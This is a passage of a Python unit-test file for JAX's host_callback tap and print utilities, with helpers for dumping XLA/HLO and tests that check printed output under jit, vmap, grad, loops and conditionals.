what = re.sub(r"((tap_func_)|(callback))=([^\]\n,]*),?", repl_func, what)
tst.assertMultiLineStrippedEqual(expected, what)
def helper_set_hlo_dump():
flags_str = os.getenv("XLA_FLAGS", "")
import shutil
dump_dir = "/tmp/xla_dump"
os.environ["XLA_FLAGS"] = f"{flags_str} --xla_dump_to={dump_dir}"
if os.path.isdir(dump_dir):
logging.warning(f"Deleting old XLA dump directory {dump_dir}")
shutil.rmtree(dump_dir)
logging.warning(f"Setting XLA dump directory {dump_dir}")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
def helper_print_optimized_hlo(fun, *args):
backend = api.lib.xla_bridge.get_backend()
c = api.xla_computation(fun)(*args)
print(re.sub(r", metadata.*", "",
backend.compile(c).hlo_modules()[0].to_string()))
def helper_log_ir(name,
f_jax,
*args,
num_partitions=None,
strip_metadata=False):
print(f"Jaxpr[{name}]: {jax.make_jaxpr(f_jax)(*args)}")
jax_comp = jax.xla_computation(f_jax)(*args)
print(f"HLO[{name}]: {jax_comp.as_hlo_text()}")
backend = jax.lib.xla_bridge.get_backend()
if num_partitions is not None:
num_replicas = 1
device_assignment = np.arange(num_partitions * num_replicas)
device_assignment = np.reshape(device_assignment, (-1, num_partitions))
use_spmd_partitioning = num_partitions > 1
compile_options = jax.lib.xla_bridge.get_compile_options(
num_replicas=num_replicas,
num_partitions=num_partitions,
device_assignment=device_assignment,
use_spmd_partitioning=use_spmd_partitioning,
)
else:
compile_options = None
jax_optimized_hlo = backend.compile(
jax_comp, compile_options).hlo_modules()[0].to_string()
if strip_metadata:
jax_optimized_hlo = re.sub(r", metadata.*", "", jax_optimized_hlo)
print(f"Optimized HLO[{name}] for "
f"platform {backend.platform}: {jax_optimized_hlo}")
prev_xla_flags = None
def setUpModule():
global prev_xla_flags
# This will control the CPU devices. On TPU we always have 2 devices
prev_xla_flags = jtu.set_host_platform_device_count(2)
# Reset to previous configuration in case other test modules will be run.
def tearDownModule():
prev_xla_flags()
def assertMultiDeviceOutputEqual(tst: jtu.JaxTestCase,
expected_2CPUs: str):
"""Check that the multi-device output is equal to the expected.
The tests run with 2 devices if available, otherwise 1 device.
We adjust the expected output here for 1 device.
Args:
expected_2CPUs: the expected output for 2 CPUs. If there is only
one device, this is trimmed to the first device. If the current
device_under_test is not a CPU, then we change the names
"""
expected = expected_2CPUs
if len(local_devices()) == 1:
start_device_1 = expected.find('device: cpu:1')
if start_device_1 >= 0:
expected = expected[0:start_device_1]
def replace_device_name(m) -> str:
return str(local_devices()[int(m.group(1))])
expected = re.sub(r'cpu:(\d+)', replace_device_name, expected)
what = testing_stream.output_sorted_by_device
return assertMultiLineStrippedEqual(tst, expected, what)
class HostCallbackTapTest(jtu.JaxTestCase):
def setUp(self):
super().setUp()
if jtu.device_under_test() == "gpu" and jax.device_count() > 1:
raise SkipTest("host_callback broken on multi-GPU platforms (#6447)")
testing_stream.reset()
testing_stream._test_method_name = self._testMethodName
self.old_flags = os.getenv("XLA_FLAGS", "")
def tearDown(self) -> None:
if os.getenv("XLA_FLAGS") != self.old_flags:
os.environ["XLA_FLAGS"] = self.old_flags
xla_bridge.get_backend.cache_clear()
hcb.barrier_wait("HostCallbackTapTest.tearDown")
super().tearDown()
def test_tap_eval(self):
self.assertAllClose((5. * 2.) ** 2, fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: a * 2
10.00
what: y * 3
30.00""", testing_stream.output)
def test_tap_with_tuple_results(self):
def func2(x):
x1, y1 = hcb.id_print((x * 2., x * 3.), output_stream=testing_stream)
return x1 + y1
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
def test_tap_with_dict_results(self):
def func2(x):
res = hcb.id_print(dict(a=x * 2., b=x * 3.), output_stream=testing_stream)
return res["a"] + res["b"]
self.assertEqual(3. * (2. + 3.), func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
{ a=6.00
b=9.00 }""", testing_stream.output)
def test_tap_with_result(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( 6.00
9.00 )""", testing_stream.output)
def test_tap_with_result_no_arg(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
x1 = hcb.id_tap(tap_func, None, result=x)
return x1
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_result_unused(self):
def tap_func(arg, transforms):
testing_stream.write(f"called tap_func with {arg}")
def func2(x):
hcb.id_tap(tap_func, None)
return x
self.assertEqual(3., func2(3.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "called tap_func with None",
testing_stream.output)
def test_tap_with_device(self):
def func2(x):
x1 = hcb.id_print((x * 2., x * 3.), result=x * 4.,
output_stream=testing_stream,
tap_with_device=True)
return x1
self.assertEqual(3. * 4., func2(3.))
hcb.barrier_wait()
assertMultiDeviceOutputEqual(self, """
device: cpu:0
( 6.00
9.00 )""")
def test_tap_eval_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise ValueError("Some user message")
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
with self.assertRaisesRegex(
hcb.CallbackException,
re.compile("There were exceptions during callback processing. Last one was:.*"
"ValueError: Some user message", re.DOTALL)):
func(0)
hcb.barrier_wait()
# We should have received everything before the error
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_empty(self):
"""Tap empty arrays."""
hcb.id_print((), output_stream=testing_stream)
hcb.id_print((1., np.ones((2, 0))), what="second", output_stream=testing_stream)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( )
what: second
( 1.00
[] )""", testing_stream.output)
def test_tap_jit_simple(self):
jit_fun1 = api.jit(lambda x: 3. * hcb.id_print(
2. * x, what="here", output_stream=testing_stream))
self.assertAllClose(6. * 5., jit_fun1(5.))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: here
10.00""", testing_stream.output)
def test_tap_jit_no_invars(self):
def func(): # jitted function does not take arguments
return hcb.id_print(42, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)())
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_multiple_invars(self):
def func(x1, x2):
return hcb.id_print(x1 + x2, output_stream=testing_stream)
self.assertAllClose(42, api.jit(func)(40, 2))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_constant(self):
def func(x):
return hcb.id_print(42, result=x, output_stream=testing_stream)
self.assertAllClose(5, api.jit(func)(5))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
42""", testing_stream.output)
def test_tap_jit_sequence1(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
return hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
logging.info("%s: %s", self._testMethodName,
api.make_jaxpr(func)(1))
logging.info("%s: %s", self._testMethodName,
api.xla_computation(func)(1).as_hlo_text())
self.assertEqual(2, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2""", testing_stream.output)
def test_tap_jit2(self):
"""A sequence of JIT."""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
return x2
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_result_unused(self):
"""We can id_print even if we don't use the result."""
def func(x):
hcb.id_print(x, where="1", output_stream=testing_stream)
hcb.id_print(x + 1, where="2", output_stream=testing_stream)
return x + 1
self.assertEqual(2, api.jit(func)(1))
self.assertEqual(11, api.jit(func)(10))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: 1
10
where: 2
11""", testing_stream.output)
def test_tap_jit_nested(self):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
def func_nested(x):
x2 = hcb.id_print(x + 1, where="nested", output_stream=testing_stream)
return x2
x3 = api.jit(func_nested)(x1)
return hcb.id_print(x3 + 1, where="3", output_stream=testing_stream)
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: nested
2
where: 3
3""", testing_stream.output)
def test_tap_jit_devices(self):
"""Running on multiple devices."""
logging.info(f"{self._testMethodName}: has devices {local_devices()}")
def func(x, device_id):
x1 = hcb.id_print(x, dev=str(device_id), output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, dev=str(device_id), output_stream=testing_stream)
return x2
for d in local_devices():
self.assertEqual(112, api.jit(func, device=d, static_argnums=1)(111, d.id))
hcb.barrier_wait()
logging.info(f"{self._testMethodName}: found output {testing_stream.output}")
self.assertEqual(
len(local_devices()), len(re.findall(r"111", testing_stream.output)))
self.assertEqual(
len(local_devices()), len(re.findall(r"112", testing_stream.output)))
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_pytree(self, with_jit=False):
def func(x, what=""):
"""Returns some pytrees depending on x"""
if what == "pair_1_x":
return (1, x)
elif what == "pair_x_2x":
return (x, 2 * x)
elif what == "dict":
return dict(a=2 * x, b=3 * x)
else:
assert False
tap_count = 0
def tap_func(a, _, *, what=""):
nonlocal tap_count
tap_count += 1
self.assertEqual(func(5, what), a)
transform = api.jit if with_jit else lambda f: f
for what in ("pair_1_x", "pair_x_2x", "dict"):
transformed = transform(
lambda x: hcb.id_tap(
partial(tap_func, what=what),
func(x, what),
result=func(x * 2, what))
)(5)
self.assertEqual(func(10, what), transformed)
hcb.barrier_wait() # Wait for receivers to be done
self.assertEqual(3, tap_count)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_concurrent_{concurrent}",
concurrent=concurrent)
for concurrent in [True, False]))
def test_tap_multiple(self, concurrent=False):
"""Call id_tap multiple times, concurrently or in sequence. """
if concurrent and jtu.device_under_test() in ["cpu", "gpu"]:
# TODO(necula): if there is device side concurrency, outfeeds from
# different computations can be interleaved. For example, it seems that
# on GPU if multiple host threads run a jit computation, the multiple
# computations are interleaved on the GPU. This can result in the outfeed
# trains being interleaved, which will trigger an error.
# The solution is to fix on GPU the receiving logic so that we can outfeed
# the train as one tuple, and receive it one piece as a time. Then the
# trains should be atomic.
# See also b/160692602.
raise SkipTest("concurrent id_tap not supported on CPU, GPU")
received = set()
count = 5
def pause_tap(idx, _):
received.add(int(idx))
logging.info(f"Starting do_tap {idx}. Sleeping 1sec ...")
time.sleep(0.3)
logging.info(f"Finish do_tap {idx}")
def do_tap(idx):
api.jit(lambda idx: hcb.id_tap(pause_tap, idx))(idx)
if concurrent:
threads = [
threading.Thread(
name=f"enqueue_tap_{idx}", target=do_tap, args=(idx,))
for idx in range(count)
]
[t.start() for t in threads]
[t.join() for t in threads]
else:
for idx in range(count):
do_tap(idx)
hcb.barrier_wait()
self.assertEqual(received, set(range(count)))
# TODO(necula): see comment for test_multiple_tap. Here we disable also
# on TPU, because the barrier_wait runs on all devices, including on the CPU
# where it would run into concurrency problems.
@skip("Concurrency not supported")
def test_tap_multiple_barriers(self):
"""Call barrier_wait concurrently."""
def pause_tap(*args, **kwargs):
logging.info("pause_tap waiting")
time.sleep(0.3)
logging.info("pause_tap done")
def long_run(x):
return hcb.id_tap(pause_tap, x)
api.jit(long_run)(5.)
def try_barrier(idx):
logging.info(f"Starting test barrier {idx}")
hcb.barrier_wait()
logging.info(f"Finished test barrier {idx}")
threads = [
threading.Thread(
name=f"barrier_{idx}", target=try_barrier, args=(idx,))
for idx in range(3)
]
[t.start() for t in threads]
[t.join() for t in threads]
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_cond(self, with_jit=False):
"""A conditional"""
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="cond_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="cond_f", result=x,
output_stream=testing_stream),
x2 + 1)
x5 = hcb.id_print(x4 + 1, where="end", output_stream=testing_stream)
return x5
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: cond_f
-1
where: end
4""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_while_cond(self, with_jit=False):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(x):
x3 = hcb.id_print(x, where="w_b_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="w_b_t",
output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="w_b_f",
result=x, output_stream=testing_stream),
x3 + 1)
return hcb.id_print(x4, where="w_b_2", output_stream=testing_stream)
x10 = lax.while_loop(lambda x: x <= 3, body, x2)
res = hcb.id_print(x10, where="end", output_stream=testing_stream)
return res
transform = api.jit if with_jit else lambda f: f
self.assertEqual(4, transform(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: w_b_1
2
where: w_b_t
3
where: w_b_2
3
where: w_b_1
3
where: w_b_f
-1
where: w_b_2
4
where: end
4""", testing_stream.output)
def test_tap_jit_while_pred_tap(self):
"""While with printing in the conditional."""
def func(x):
x1 = hcb.id_print(x, where="1")
x10 = lax.while_loop(lambda x: hcb.id_print(x < 3,
where="w_p",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x10, where="3", output_stream=testing_stream)
return res
self.assertEqual(3, api.jit(func)(1))
hcb.barrier_wait()
assertMultiLineStrippedEqual(self,
"""
where: w_p
True
where: w_b
2
where: w_p
True
where: w_b
3
where: w_p
False
where: 3
3""", testing_stream.output)
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_with_jit_{with_jit}",
with_jit=with_jit)
for with_jit in [True, False]))
def test_tap_scan_cond(self, with_jit=True):
def func(x):
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = hcb.id_print(x1 + 1, where="2", output_stream=testing_stream)
def body(c, x):
x3 = hcb.id_print(x, where="s_1", output_stream=testing_stream)
x4 = lax.cond(x % 2 == 0,
lambda x: hcb.id_print(x, where="s_t", output_stream=testing_stream),
lambda x: hcb.id_print(-1, where="s_f", result=x, output_stream=testing_stream),
x3 + 1)
return (c, hcb.id_print(x4, where="s_2", output_stream=testing_stream))
_, x10 = lax.scan(body, x2, jnp.arange(3))
res = hcb.id_print(x10, where="10", output_stream=testing_stream)
return res
if with_jit:
func = api.jit(func)
res = func(1)
self.assertAllClose(jnp.array([1, 2, 3]), res)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
where: 1
1
where: 2
2
where: s_1
0
where: s_t
1
where: s_2
1
where: s_1
1
where: s_f
-1
where: s_2
2
where: s_1
2
where: s_t
3
where: s_2
3
where: 10
[1 2 3]""", testing_stream.output)
testing_stream.reset()
@parameterized.named_parameters(
jtu.cases_from_list(
dict(
testcase_name=f"_shape_{shape}_dtype_{np.dtype(dtype).name}_nr_args={nr_args}",
shape=shape,
dtype=dtype,
nr_args=nr_args) for nr_args in [1, 2]
for shape in [(), (2,), (2, 3), (2, 3, 4)]
for dtype in jtu.dtypes.all))
def test_tap_jit_dtypes(self, nr_args=2, dtype=jnp.int16, shape=(2,)):
if dtype in (jnp.complex64, jnp.complex128, jnp.bool_):
raise SkipTest(f"host_callback not implemented for {dtype}.")
if dtype == np.bool_:
args = [np.random.choice(a=[True, False], size=shape)]
else:
args = [jnp.arange(np.prod(shape), dtype=dtype).reshape(shape)]
if nr_args > 1:
args = args * nr_args
jit_fun1 = api.jit(lambda xs: hcb.id_print(
xs,
a_new_test="************",
testcase_name=f"shape_{shape}_dtype_{dtype}_nr_args={nr_args}"))
res = jit_fun1(args)
self.assertAllClose(args, res, check_dtypes=True)
def test_tap_jit_large(self):
arg = jnp.arange(10000, dtype=jnp.int32).reshape((10, 10, 5, -1))
api.jit(hcb.id_print)(arg)
def test_tap_jit_several_together(self):
arg = jnp.arange(50, dtype=jnp.int32).reshape((10, 5))
api.jit(lambda x, y: hcb.id_print((x, y, x * 2.)))(arg, jnp.ones(100, dtype=jnp.int32))
def test_tap_jit_interleaving(self):
# Several jit's without data dependencies; they may interfere
count = 0 # Count tap invocations
nr_arrays = 5
def tap_func(arg, _):
nonlocal count
assert len(arg) == nr_arrays
count += 1
# This is the function that we'll run multiple times
def func(x, count):
for i in range(count):
x = hcb.id_tap(tap_func, [x + i for i in range(nr_arrays)])[-1]
return x
x = jnp.array(1, dtype=np.int32)
res = 0
for _ in range(10):
# No dependencies between the jit invocations
res += api.jit(lambda x: func(x, 10))(x)
hcb.barrier_wait()
self.assertEqual(100, count)
def test_tap_jit_tap_exception(self):
if not FLAGS.jax_host_callback_outfeed:
raise SkipTest("TODO: implement error handling for customcall")
# Simulate a tap error
def tap_err(*args, **kwargs):
raise NotImplementedError
def func(x):
x1 = hcb.id_print(x + 1, what="x1", output_stream=testing_stream)
x2 = hcb.id_tap(tap_err, x1 + 1)
x3 = hcb.id_print(x2 + 1, what="x3", output_stream=testing_stream)
return x3
res = api.jit(func)(0) # No error yet
with self.assertRaises(hcb.CallbackException):
hcb.barrier_wait()
# Even though the receiver thread raised, the main thread should still
# return 3.
self.assertEqual(3, res)
# We should have received all others
assertMultiLineStrippedEqual(self, """
what: x1
1
what: x3
3""", testing_stream.output)
def test_tap_while(self):
"""Executing while, even without JIT uses compiled code"""
y = jnp.ones(5) # captured const
def func(x):
return lax.while_loop(
lambda c: c[1] < 5,
lambda c: (y, hcb.id_print(c[1], output_stream=testing_stream) + 1),
(x, 1))
func(y)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
1
2
3
4""", testing_stream.output)
def test_tap_jvp(self):
jvp_fun1 = lambda x, xt: api.jvp(fun1, (x,), (xt,))
res_primals, res_tangents = jvp_fun1(jnp.float32(5.), jnp.float32(0.1))
self.assertAllClose(100., res_primals, check_dtypes=False)
self.assertAllClose(4., res_tangents, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: ['jvp'] what: a * 2
( 10.00
0.20 )
transforms: ['jvp'] what: y * 3
( 30.00
0.60 )""", testing_stream.output)
def test_tap_grad_primal_unused(self):
# The output of id_print is not needed for backwards pass
def func(x):
return 2. * hcb.id_print(x * 3., what="x * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
arg = jnp.float32(5.)
jaxpr = str(api.make_jaxpr(grad_func)(arg))
# making the Jaxpr does not print anything
hcb.barrier_wait()
treedef = tree_util.tree_structure(arg)
assertMultiLineStrippedEqual(self, f"""
{{ lambda ; a.
let b = mul a 3.00
c = outside_call[ arg_treedef={treedef}
callback=...
identity=True
transforms=( ) ] b
_ = mul c 2.00
d = mul 1.00 2.00
_ = broadcast_in_dim[ broadcast_dimensions=( )
shape=( ) ] 0.00
e = outside_call[ arg_treedef={treedef}
callback=...
identity=True
transforms=(('jvp',), ('transpose',)) ] d
f = mul e 3.00
in (f,) }}""", jaxpr)
assertMultiLineStrippedEqual(self, "", testing_stream.output)
testing_stream.reset()
res_grad = grad_func(arg)
hcb.barrier_wait()
self.assertAllClose(6., res_grad, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
what: x * 3
15.00
transforms: ['jvp', 'transpose'] what: x * 3
2.00""", testing_stream.output)
def test_tap_grad_simple(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * hcb.id_print(y * 3., what="y * 3",
output_stream=testing_stream)
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(2. * 5. * 6., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
what: y * 3
30.00
transforms: ['jvp', 'transpose'] what: y * 3
5.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00""", testing_stream.output)
def test_tap_grad_grad(self):
def func(x):
y = hcb.id_print(x * 2., what="x * 2", output_stream=testing_stream)
return x * (y * 3.)
grad_func = api.grad(api.grad(func))
# making the Jaxpr does not print anything
_ = api.make_jaxpr(grad_func)(5.)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, "", testing_stream.output)
res_grad = grad_func(jnp.float32(5.))
self.assertAllClose(12., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: x * 2
10.00
transforms: ['jvp', 'transpose'] what: x * 2
15.00
transforms: ['jvp', 'transpose'] what: x * 2
3.00
transforms: ['jvp', 'transpose', 'jvp', 'transpose'] what: x * 2
2.00""", testing_stream.output)
def test_tap_grad_pytree(self):
def func(x):
x4, x5 = hcb.id_print((x * 2., x * 3.), what="pair",
result=(x * 4., x * 5.),
output_stream=testing_stream)
return x4 + 2. * x5
x = jnp.float32(5.)
grad_func = api.grad(func)
print(api.make_jaxpr(grad_func)(x))
res_grad = grad_func(x)
self.assertAllClose(14., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 10.00
15.00 )
transforms: ['jvp', 'transpose'] what: pair
( 0.00
0.00 )""", testing_stream.output)
def test_tap_jvp_float0(self):
def f(x, yint):
x, yint = hcb.id_tap(lambda arg, _: arg, (x, yint))
return x * yint
res = api.jvp(f, (2., 3), (0.2, np.zeros((), dtypes.float0)))
self.assertAllClose((6., 0.6), res)
def test_tap_grad_float0(self):
def func(x, yint):
x, yint = hcb.id_print((x, yint), what="pair", output_stream=testing_stream)
return x * yint
grad_func = api.grad(func)
res_grad = grad_func(jnp.float32(5.), jnp.int32(2))
self.assertAllClose(2., res_grad, check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
what: pair
( 5.00
2 )
transforms: ['jvp', 'transpose'] what: pair
( 2.00
False )""", testing_stream.output)
def test_tap_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (3. * x[0], x[1])
def f_jax_vjp(x):
res, pullback = jax.vjp(f_jax, x)
g, = pullback((np.ones(x[0].shape, dtype=x[0].dtype),
np.zeros(x[1].shape, dtype=dtypes.float0)))
return g
g = f_jax_vjp(x)
self.assertAllClose(np.array([3., 3.], dtype=np.float32), g[0])
self.assertEqual(dtypes.float0, g[1].dtype)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00]
[False False False] )""", testing_stream.output)
def test_tap_higher_order_grad_float0_result(self):
# https://github.com/google/jax/issues/7340
# x is a Tuple[f32[2], s32[3]]
x = (np.array([.7, .8], dtype=np.float32),
np.array([11, 12, 13], dtype=np.int32))
def f_jax(x):
x = hcb.id_print(x, result=x, output_stream=testing_stream) # result= is important
return (jnp.sin(x[0]), x[1])
def wrap_vjp(f, args, res_f_of_args):
# Given a function "f" and "args" return the f_vjp and args_vjp
def make_ct(res):
res_dtype = np.result_type(res)
if res_dtype == dtypes.float0:
return res
ct_dtype = core.primal_dtype_to_tangent_dtype(res_dtype)
return np.ones(np.shape(res), dtype=ct_dtype)
cts = tree_util.tree_map(make_ct, res_f_of_args)
def f_vjp(args, cts):
res, pullback = jax.vjp(f, *args)
return pullback(cts)
return (f_vjp, (args, cts))
res = f_jax(x)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )""", testing_stream.output)
testing_stream.reset()
# 1st order
f_jax_vjp1, args_vjp1 = wrap_vjp(f_jax, (x,), res)
res_vjp1 = f_jax_vjp1(*args_vjp1)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
( [0.70 0.80]
[11 12 13] )
transforms: ['jvp', 'transpose']
( [0.00 0.00]
[False False False] )""", testing_stream.output)
testing_stream.reset()
# 2nd order
f_jax_vjp2, args_vjp2 = wrap_vjp(f_jax_vjp1, args_vjp1, res_vjp1)
res_vjp2 = f_jax_vjp2(*args_vjp2)
# 3rd order
f_jax_vjp3, args_vjp3 = wrap_vjp(f_jax_vjp2, args_vjp2, res_vjp2)
_ = f_jax_vjp3(*args_vjp3)
def test_tap_vmap(self):
vmap_fun1 = api.vmap(fun1)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
vmap_fun1(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] what: a * 2
[ 8.00 10.00]
transforms: [('batch', {'batch_dims': (0,)})] what: y * 3
[24.00 30.00]""", testing_stream.output)
def test_tap_vmap_not_batched(self):
x = 3.
def func(y):
# x is not mapped, y is mapped
_, y = hcb.id_print((x, y), output_stream=testing_stream)
return x + y
vmap_func = api.vmap(func)
vargs = jnp.array([jnp.float32(4.), jnp.float32(5.)])
_ = vmap_func(vargs)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (None, 0)})]
( 3.00
[4.00 5.00] )""", testing_stream.output)
def test_tap_vmap_vmap(self):
# A 2D tensor with x[i, j] = i + j using 2 vmap
def sum(x, y):
return hcb.id_print(x + y, output_stream=testing_stream)
def sum_rows(xv, y):
return api.vmap(sum, in_axes=(0, None))(xv, y)
def sum_all(xv, yv):
return api.vmap(sum_rows, in_axes=(None, 0))(xv, yv)
xv = jnp.arange(5, dtype=np.int32)
yv = jnp.arange(3, dtype=np.int32)
# assertMultiLineStrippedEqual(self, "", str(api.make_jaxpr(sum_all)(xv, yv)))
_ = sum_all(xv, yv)
hcb.barrier_wait()
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)}), ('batch', {'batch_dims': (0,)})]
[[0 1 2 3 4]
[1 2 3 4 5]
[2 3 4 5 6]]""", testing_stream.output)
def test_tap_vmap_while(self):
"""Vmap of while."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="before:x", output_stream=testing_stream)
x2 = lax.while_loop(
lambda x: x < 2, lambda x: hcb.id_print(
x + 1, where="body:x+1", output_stream=testing_stream), x1)
res = hcb.id_print(x2, where="after:x", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
self.assertAllClose(
np.array([2, 2, 2, 3, 4]),
api.jit(api.vmap(func))(inputs),
check_dtypes=False)
hcb.barrier_wait()
assertMultiLineStrippedEqual(
self, """
transforms: [('batch', {'batch_dims': (0,)})] where: before:x
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: body:x+1
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: after:x
[2 2 2 3 4]""", testing_stream.output)
def test_tap_vmap_while_tap_cond(self):
"""Vmap of while, with a tap in the conditional."""
def func(x):
# like max(x, 2)
x1 = hcb.id_print(x, where="1", output_stream=testing_stream)
x2 = lax.while_loop(lambda x: hcb.id_print(x < 2, where="w_c",
output_stream=testing_stream),
lambda x: hcb.id_print(x + 1, where="w_b",
output_stream=testing_stream),
x1)
res = hcb.id_print(x2, where="3", output_stream=testing_stream)
return res
inputs = np.arange(5, dtype=np.int32)
res = api.jit(api.vmap(func))(inputs)
hcb.barrier_wait()
self.assertAllClose(np.array([2, 2, 2, 3, 4]), res, check_dtypes=False)
assertMultiLineStrippedEqual(self, """
transforms: [('batch', {'batch_dims': (0,)})] where: 1
[0 1 2 3 4]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True True False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[1 2 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[ True False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: w_b
[2 3 3 4 5]
transforms: [('batch', {'batch_dims': (0,)})] where: w_c
[False False False False False]
transforms: [('batch', {'batch_dims': (0,)})] where: 3
[2 2 2 3 4]""", testing_stream.output)
def test_tap_transforms(self):
def power3(x):
y = x * x
# Print both 'x' and 'x^2'. Must pack as a tuple.
_, y = hcb.id_print((x, y), what="x,x^2", output_stream=testing_stream)
return y * x
print(f"impl = {power3(3.)}")
hcb.barrier_wait()
expected = """
what: x,x^2
( 3.
9. )"""
self.assertMultiLineStrippedEqual(expected, testing_stream.output)
testing_stream.reset()
print(f"vmap = {jax.vmap(power3)(np.arange(3.))}")
hcb.barrier_wait()
expected = """
